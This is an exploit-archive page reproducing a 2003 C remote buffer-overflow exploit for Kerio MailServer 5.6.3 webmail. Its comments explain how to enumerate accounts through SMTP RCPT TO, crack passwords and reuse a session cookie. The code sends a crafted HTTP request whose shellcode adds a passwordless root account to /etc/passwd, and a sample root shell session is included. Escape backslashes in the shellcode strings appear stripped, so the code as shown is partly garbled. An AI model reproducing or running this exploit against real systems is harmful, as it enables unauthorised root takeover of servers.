[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Kerio MailServer 5.6.3 Remote Buffer Overflow Exploit
# Published : 2003-06-27
# Author : B-r00t
# Previous Title : Yahoo Messenger 5.5 Remote Exploit (DSR-ducky.c)
# Next Title : ProFTPD 1.2.9RC1 (mod_sql) Remote SQL Injection Exploit
/* Remote Buffer Overflow Exploit for Kerio MailServer 5.6.3 */
/* ========================================= */
/* By B-r00t */
/* */
/* In response to the Kerio Mailserver vulnerabilities */
/* discovered by David F.Madrid. */
/* */
/* Although this exploit requires valid authentication */
/* details, it is possible to use 'RCPT TO' to enumerate */
/* valid accounts 'A La Sendmail' as shown below: - */
/*
$ telnet 192.168.0.10 25
Trying 192.168.0.10...
Connected to 192.168.0.10.
Escape character is '^]'.
220 dhcp-185-45 Kerio MailServer 5.6.3 ESMTP ready
mail from: Br00t@host.net
250 2.1.0 Sender <Br00t@host.net> ok
rcpt to: nosuchuser@host.net
550 5.1.1 Mailbox <nosuchuser@host.net> does not exist
rcpt to:admin@host.net
250 2.1.5 Recipient <admin@host.net> ok (local) << default
admin account.
rcpt to: fred@host.net
250 2.1.5 Recipient <fred@host.net> ok (local) << user fred
seems to exist.
rset
250 2.0.0 Reset state
quit
221 2.0.0 SMTP closing connection
Connection closed by foreign host.
*/
/* Using a dictionary attack to obtain a large number */
/* of accounts in conjunction with users natural */
/* stupidity for using easy to guess passwords should */
/* yield at least one valid account. */
/* */
/* Once an account has been cracked, login to the */
/* Kerio webmail service and record the 'userid' */
/* cookie value: - */
/*
$ lynx 192.168.0.10
Username: fred___________
Password: _______________
OK
192.168.0.10 cookie: userid=7dc1700017e708a5 Allow? (Y/N/Always/neVer)
*/
/* Accept the cookie 'Y' to ensure you are fully */
/* logged in to the Kerio webmail service. */
/*
[br00t@silvia:~] $ ./keriobaby 192.168.0.10 userid=7dc1700017e708a5
Payload: 408 / 408 bytes
Wall0p! ... !!!
If successful a UID 0 Account 'keriohacker'
has been appended to /etc/passwd. Use 'ssh'
or 'su' (if local) to get r00t! ....
[br00t@silvia:~] $ ssh -l keriohacker 192.168.0.10
Last login: Thu Jun 5 08:21:30 2003
sh-2.05# id
uid=0(root) gid=0(root) groups=0(root)
sh-2.05# tail -1 /etc/passwd
keriohacker::0:0:B-r00t~R0x~Y3r~W0rld!.:/tmp:/bin/sh
sh-2.05#
*SSH assumes: PermitRootLogin yes & PermitEmptyPasswords yes
Alternative: Recode the shellcode to add normal user!
That's All Folks ...
ENJOY!
*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define DEST_PORT 80
int main ( int argc, char *argv[] )
{
int socketfd, bytes;
struct sockaddr_in dest_addr;
char buffer[700];
// char ret[] = "x07xf7x7fxbe"; // Use this if attached with GDB
char ret[] = "x07xf7xffxbe"; // RedHat Linux 7.2 +
kerio-mailserver-mcafee-5.6.3-rh7.i386.rpm
char *ptr = buffer;
char req[] = "GET /list?folder=~";
char cr[] = "x0Dx0A";
char shellcode[] =
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
// Fat Bloke Shellcode to avoid HTTP chars by B-r00t..
// Appends: keriohacker::0:0:B-r00t~R0x~Y3r~W0rld!.:/tmp:/bin/sh
"xebx55x5exb0xffx2cxd0x88x06x88x46x04x88x46x34"
"x88x46x39x88x46x3dx31xc0x88x46x0bx88x46x41x66"
"xb8x0bx27x66x2dx01x27x66x89x46x40x8dx5ex0cx89"
"x5ex42xb0x05x8dx1ex66xb9x42x04x66xbaxe4x01xcd"
"x80x89xc3xb0x04x8bx4ex42x31xd2xb2xffx80xeaxca"
"xcdx80xb0x06xcdx80xb0x01x31xdbxcdx80xe8xa6xff"
"xffxffx58x65x74x63x58x70x61x73x73x77x64x58x6b"
"x65x72x69x6fx68x61x63x6bx65x72x3ax3ax30x3ax30"
"x3ax42x2dx72x30x30x74x7ex52x30x78x7ex59x33x72"
"x7ex57x30x72x6cx64x21x2ex3ax58x74x6dx70x3ax58"
"x62x69x6ex58x73x68x58x58x41x41x41x41"
"x90x90x90x90x90x90";
memset (buffer, '�', sizeof (buffer));
if (argc < 3) {
printf("nUsage: %s [IP_ADDRESS] [COOKIE]", argv[0]);
printf("nExample: %s 10.0.0.1 userid=771c740df0270936n",
argv[0]);
exit (1);
}
printf ("nPayload: %d / 408 bytesnn", strlen(shellcode));
strcpy (buffer, req);
strcat (buffer, shellcode);
strcat (buffer, ret);
strcat (buffer, ret);
strcat (buffer, " HTTP/1.0");
strcat (buffer, cr);
strcat (buffer, "Cookie: ");
strcat (buffer, argv[2]);
strcat (buffer, cr);
strcat (buffer, cr);
if ((socketfd = socket(AF_INET, SOCK_STREAM, 0)) == -1){
perror("Socket");
exit (1);
}
dest_addr.sin_family = AF_INET;
dest_addr.sin_port = htons(DEST_PORT);
if (! inet_aton(argv[1], &(dest_addr.sin_addr))) {
perror("inet_aton problems");
exit (2);
}
memset( &(dest_addr.sin_zero), '�', 8);
if (connect (socketfd, (struct sockaddr *)&dest_addr, sizeof (struct
sockaddr)) == -1){
perror("connect failed");
close (socketfd);
exit (3);
}
bytes = (send (socketfd, ptr, strlen(buffer), 0));
if (bytes == -1) {
perror("send error");
close (socketfd);
exit(4);
}
close (socketfd);
printf ("nWall0p! ... !!!nn");
printf ("nIf successful a UID 0 Account 'keriohacker'");
printf ("nhas been appended to /etc/passwd. Use 'ssh'");
printf ("nor 'su' (if local) to get r00t! ....nn");
}
// www.Syue.com [2003-06-27]